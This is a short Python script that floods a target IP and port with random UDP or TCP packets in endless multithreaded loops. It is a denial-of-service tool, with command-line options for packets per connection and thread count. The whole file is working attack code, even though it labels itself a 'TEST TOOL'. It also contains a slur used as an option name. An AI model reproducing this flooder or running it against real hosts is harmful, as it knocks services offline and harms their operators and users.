#!/usr/bin/env python3
#Code by Zixpzy
import argparse
import random
import socket
import threading
print(r"""
  ________                                                 
 /\_____  \     __                                         
 \/____//'/'   /\_\    __  _   _____    ____     __  __    
      //'/'    \/\ \  /\ \/'\ /\ '__`\ /\_ ,`\  /\ \/\ \   
     //'/'___   \ \ \ \/>  </ \ \ \L\ \\/_/  /_ \ \ \_\ \  
     /\_______\  \ \_\ /\_/\_\ \ \ ,__/  /\____\ \/`____ \ 
     \/_______/   \/_/ \//\/_/  \ \ \/   \/____/  `/___/> \
                                 \ \_\               /\___/
                                  \/_/               \/__/ """)
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", required=True, type=str, help="Host ip")
ap.add_argument("-p", "--port", required=True, type=int, help="Port")
ap.add_argument("-c", "--choice", type=str, default="y", help="UDP(y/n)")
ap.add_argument("-t", "--times", type=int, default=50000, help="Packets per one connection")
ap.add_argument("-rt", "--retard", type=str, default="n", help="retard(y/n)")

ap.add_argument("-th", "--threads", type=int, default=5, help="Threads")
args = vars(ap.parse_args())

print("-->TEST TOOL<--")
print("#-- 𝙺𝚒𝚣𝚣𝚢 𝙷𝚊𝚝𝚎𝚜 𝚂𝚔𝚒𝚍𝚜 --#")
print("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-")
ip = args['ip']
port = args['port']
choice = args['choice']
times = args['times']
threads = args['threads']

def run():
	data = random._urandom(1024)
	i = random.choice(("[!]","[!]","[!]"))
	while True:
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
			addr = (str(ip),int(port))
			for x in range(times):
				s.sendto(data,addr)
			print(i +"~SENT")
		except:
			print("~FAILED")

def run2():
	data = random._urandom(16)
	i = random.choice(("[!]","[!]","[!]"))
	while True:
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.connect((ip,port))
			s.send(data)
			for x in range(times):
				s.send(data)
			print(i +"~SENT")
		except:
			s.close()
			print("~FAILED")

for y in range(threads):
	if choice == 'y':
		th = threading.Thread(target = run)
		th.start()
	else:
		th = threading.Thread(target = run2)
		th.start()
